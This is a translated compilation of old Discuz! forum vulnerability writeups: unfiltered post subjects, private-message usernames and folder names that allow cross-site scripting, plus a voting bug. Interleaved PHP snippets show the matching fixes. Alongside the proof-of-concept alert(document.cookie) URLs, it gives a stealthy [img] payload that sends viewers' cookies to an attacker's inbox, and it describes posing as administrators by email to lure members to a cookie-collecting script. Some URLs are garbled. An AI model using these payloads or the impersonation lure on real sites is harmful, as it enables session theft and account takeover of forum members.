Famous PHP open-source forum: Discuz! cross-site scripting collection

Source: Internet
Author: User

In Discuz!, the subject field of posts, replies, PMs and the like is not filtered, so code can be inserted there as well.

For example:

http://xxx/post.php?action=newthread&fid=2... percentage %3E%3cb%22

The result is that your own cookie is popped up first.

Exploitation method: place the above code inside an [img] tag.

Applicable versions:

Discuz! 2.x

Discuz! 3.x

Discuz! 2.0: tricking members into giving up their cookies

A security vulnerability exists in the PM (private message) function of the xxxfan forum; it is described as follows.

The following is the link for sending a private message to a member on xxxfan (assuming the member name is xxxfan):

http://xxx/pm.php?action=send&username=xxxfan

Because the forum program does not filter the member name but displays it directly in the "To:" field, script code can be appended after the name. For example:

http://xxx/pm.php?action=send&username=xxxfan";><SCRIPT>alert(document.cookie)</SCRIPT><B%20"

After clicking the above link, the first thing that pops up is your own cookie content.

Of course, we can first set up a script on our own site to collect cookies, something like

getcookie.php?cookie=

But how do we trick members into clicking? Simply posting it on the forum is far too easy to spot. Instead, another feature of the Discuz! forum program can be used: "post to friends".

Because Discuz! does not filter, verify, or template the entered email address, this feature can be used to impersonate anyone when sending email to others, which makes it hard to detect. Using it, we can pose as an xxxfan administrator and send a member a letter enticing them to click on the URL we have prepared; what bait to use is up to us, for example: "The forum is testing new features. Please click the address above. We will record your clicks in the background and award you points at the appropriate time as a reward."

Because the link points to xxxfan, and both the sender name and the email address are official xxxfan addresses, the message is highly credible and leaves no trace. Of course, for extra concealment the content inside <SCRIPT> can also be encoded.

You can then try cookie spoofing, or brute-force cracking of the MD5 password.

This method applies to most forums running Discuz! 2.0. For the Discuz! 3.0 method, see the Discuz! whisper (PM) vulnerability I posted earlier.

[Bug] Discuz! voting bug

Voting is done through

misc.php?action=votepoll&fid=2&tid=16980&pollanswers[]=N

(N is the option index, starting from 0)

That is, a vote can be cast directly through the URL.

But what if N is greater than the largest option index?

The submission succeeds, but an option with a blank title is added.

See:

http://discuz.net/viewthread.php?tid=20020&sid=dympec

(The last blank one is the one I just added.)
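As an added illustration (not Discuz! source code) of the voting defect described above: a vote handler that accepts any pollanswers[] index and silently creates the missing option, beside a hardened handler that rejects the request unless every index names an existing option. Function names and the sample poll are hypothetical.

```php
<?php
// Added illustration, not Discuz! source code. pollanswers[] is accepted
// without checking it against the number of options, so an out-of-range
// index ends up creating a blank option. Function names are hypothetical.

// Vulnerable pattern: every submitted index is counted, and a missing
// option is silently created with an empty title.
function record_votes_vulnerable(array $options, array $answers): array {
    foreach ($answers as $i) {
        $i = (int) $i;
        if (!isset($options[$i])) {
            $options[$i] = ['title' => '', 'votes' => 0];   // the blank option
        }
        $options[$i]['votes']++;
    }
    return $options;
}

// Hardened pattern: an index is valid only if that option already exists.
// Duplicates collapse so one request cannot vote an option twice, and a
// single bad index rejects the whole request instead of being "repaired".
function record_votes_safe(array $options, array $answers): ?array {
    $seen = [];
    foreach ($answers as $raw) {
        if (!ctype_digit((string) $raw)) {
            return null;                  // non-numeric or empty value
        }
        $i = (int) $raw;
        if ($i >= count($options)) {
            return null;                  // out of range: reject, never create
        }
        $seen[$i] = true;
    }
    foreach (array_keys($seen) as $i) {
        $options[$i]['votes']++;
    }
    return $options;
}

// Constructed sample poll with three options, indexed from 0 as in the writeup.
$poll = [
    ['title' => 'Yes',   'votes' => 4],
    ['title' => 'No',    'votes' => 2],
    ['title' => 'Maybe', 'votes' => 1],
];
print_r(record_votes_vulnerable($poll, ['7']));   // a 4th entry with title ''
var_dump(record_votes_safe($poll, ['7']));       // NULL: request rejected
print_r(record_votes_safe($poll, ['1', '1']));   // 'No' gains exactly one vote
```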

Affected versions:

Discuz! 3.x

Discuz! 2.x (probably, not tested)

Discuz! code vulnerability

This follows the vulnerability found yesterday; the original discoverer is pk0909.

Here is a simple test payload:

http://www.xxxx.net/phpbbs/post.php?action...%3C%2fscript%3E

The above code displays your cookie.

The following is test code from a well-known forum. Whoever views the page has their cookie sent to the specified member's private message box, which is stealthy. And if someone quotes your post, haha, theirs ends up there too.

[Img] http://xxx.com/xx.gif%22%20style=display:none%3e%3c/img%3e%3cscript%3evar%20Req=new%20ActiveXObject (% 22msxml2. XMLHTTP % 22); Req. Open (% 22 Post % 22, % 22 http://www.XXXX.com/forum/pm.php? Action = Send % 22, false); var % 20 forms = % 22 pmsubmit = submit % 22. tolowercase () % 2B % 22% 26 msgto = XXXXX % 26 subject = cookie % 26 saveoutbox = 0% 26 message = % 22% 2 bescape (document .. cookie); req. setRequestHeader (% 22content-length % 22, forms. length) % 3breq. setRequestHeader (% 22content-type % 22, % 22 Application/X-WWW-form-urlencoded % 22); req. send (Forms); % 3C/script % 3E % 3cb % 22 [/img]
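As an added illustration (not Discuz! source code) of the fix for the [img] case above: a BBCode renderer that only emits an img tag for a plain http(s) link to an image file, so quotes, angle brackets or percent-escapes in the URL cannot close the src attribute and inject further markup. The function name is hypothetical.

```php
<?php
// Added illustration, not Discuz! source code. The payload above works by
// putting an encoded quote and extra markup inside the [img] URL so that the
// emitted <img src="..."> attribute is closed early. Rendering only URLs that
// match a strict allow-list removes that possibility. Name is hypothetical.
function render_img_bbcode(string $text): string {
    return preg_replace_callback(
        '/\[img\](.*?)\[\/img\]/is',
        function (array $m): string {
            $url = trim($m[1]);
            // Allow-list: http(s) scheme, a host, a path ending in an image
            // extension, and only characters legal in a plain URL. Percent
            // signs are deliberately excluded, so encoded quotes or angle
            // brackets cannot be smuggled through the check.
            $ok = preg_match(
                '#^https?://[A-Za-z0-9.\-]+(?::\d+)?/[A-Za-z0-9_./\-]*\.(?:gif|jpe?g|png)$#i',
                $url
            );
            if (!$ok) {
                // Emit no tag at all; show the original text, escaped.
                return htmlspecialchars($m[0], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
            }
            // Escape anyway: defence in depth if the pattern is later relaxed.
            $safe = htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
            return '<img src="' . $safe . '" alt="" />';
        },
        $text
    );
}

// Constructed samples: a legitimate image, then a value shaped like the
// payload above (not a bare image URL, so it is rejected and shown as text).
echo render_img_bbcode('[img]http://xxx.com/xx.gif[/img]'), "\n";
echo render_img_bbcode('[img]http://xxx.com/xx.gif%22%20style=display:none%3e[/img]'), "\n";
```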

Discuz! and UT cross-site scripting vulnerability found: a private message cross-site scripting vulnerability, of a kind that is already very common.

For background on this class of issue, see:

http://www.cert.org/advisories/CA-2000-02.html

The following describes the private message function of the Discuz! and UT forum programs.

Affected versions:

Discuz! 1.x

Discuz! 2.0 (builds 0609, 0820)

Discuz! 3.x

UT 1.0

Vulnerability description:

Discuz! sends a whisper (private message) to a specified member through a URL of the form http://www.XXXX.net/phpbbs/pm.php?action=send&username=Name, but the name is not filtered and is displayed directly on the message-sending page. This opens the door to cookie stealing or more serious damage.

Discuz! 3.x has changed this to a URL of the form http://XXX.net/pm.php?action=send&uid=XXXX to avoid the vulnerability, but the folder name used when selecting a message folder is not filtered, so the same vulnerability still exists there.

Example:

http://www.XXXX.net/phpbbs/pm.php?action=s...d&username=Name%22%3E%3cscript%3ealert(document.cookie)%3C/script%3E%3cb%22

The preceding example displays your cookie. (For Discuz! 1.x and Discuz! 2.x)

http://XXX.net/pm.php?folder=inbox%22%3E%3... percentage %3E%3cb%22

This displays your own cookie. (For Discuz! 3.x)
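As an added illustration (not Discuz! source code) of the common root cause behind the post subject, the PM "To:" username and the 3.x folder name cases above: a request value echoed straight into an HTML attribute, beside a hardened version that encodes for that context and, for the folder, uses an allow-list. Function names and the folder list are hypothetical.

```php
<?php
// Added illustration, not Discuz! source code. The post subject, the PM
// "To:" username and the 3.x folder name are all request values echoed
// straight into HTML; this shows that pattern beside a hardened version.
// Function names and the folder list are hypothetical.

// Vulnerable pattern: the raw parameter lands inside an attribute value,
// so a double quote in it closes value="..." and the rest becomes markup.
function render_to_field_vulnerable(string $username): string {
    return '<input type="text" name="username" value="' . $username . '">';
}

// Hardened pattern: encode for the HTML attribute context. ENT_QUOTES
// escapes both quote characters, so the value can never leave the attribute.
function render_to_field_safe(string $username): string {
    $safe = htmlspecialchars($username, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="username" value="' . $safe . '">';
}

// Discuz! 3.x variant: a folder is a choice from a small fixed set, so an
// allow-list is stricter than escaping. Anything else falls back to inbox.
function normalize_folder(string $folder): string {
    $allowed = ['inbox', 'outbox', 'savebox'];   // constructed, hypothetical
    return in_array($folder, $allowed, true) ? $folder : 'inbox';
}

// Constructed sample: the proof-of-concept value from this writeup, decoded.
$probe = 'Name"><script>alert(document.cookie)</script><b"';

echo render_to_field_vulnerable($probe), "\n"; // <script> becomes live markup
echo render_to_field_safe($probe), "\n";       // &lt;script&gt;... stays text
echo normalize_folder('inbox"><script>'), "\n"; // inbox
```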

Although UT filters the subject, that is, %27 is converted to ', it does not filter the recipient field, so a similar vulnerability exists. Example omitted. (The code differs between UT forums, but similar vulnerabilities exist in general.)

Hazard level: medium to low

Preventive measures:

Check the actual content of a hyperlink before clicking it. For security patches, keep an eye on the official forum.
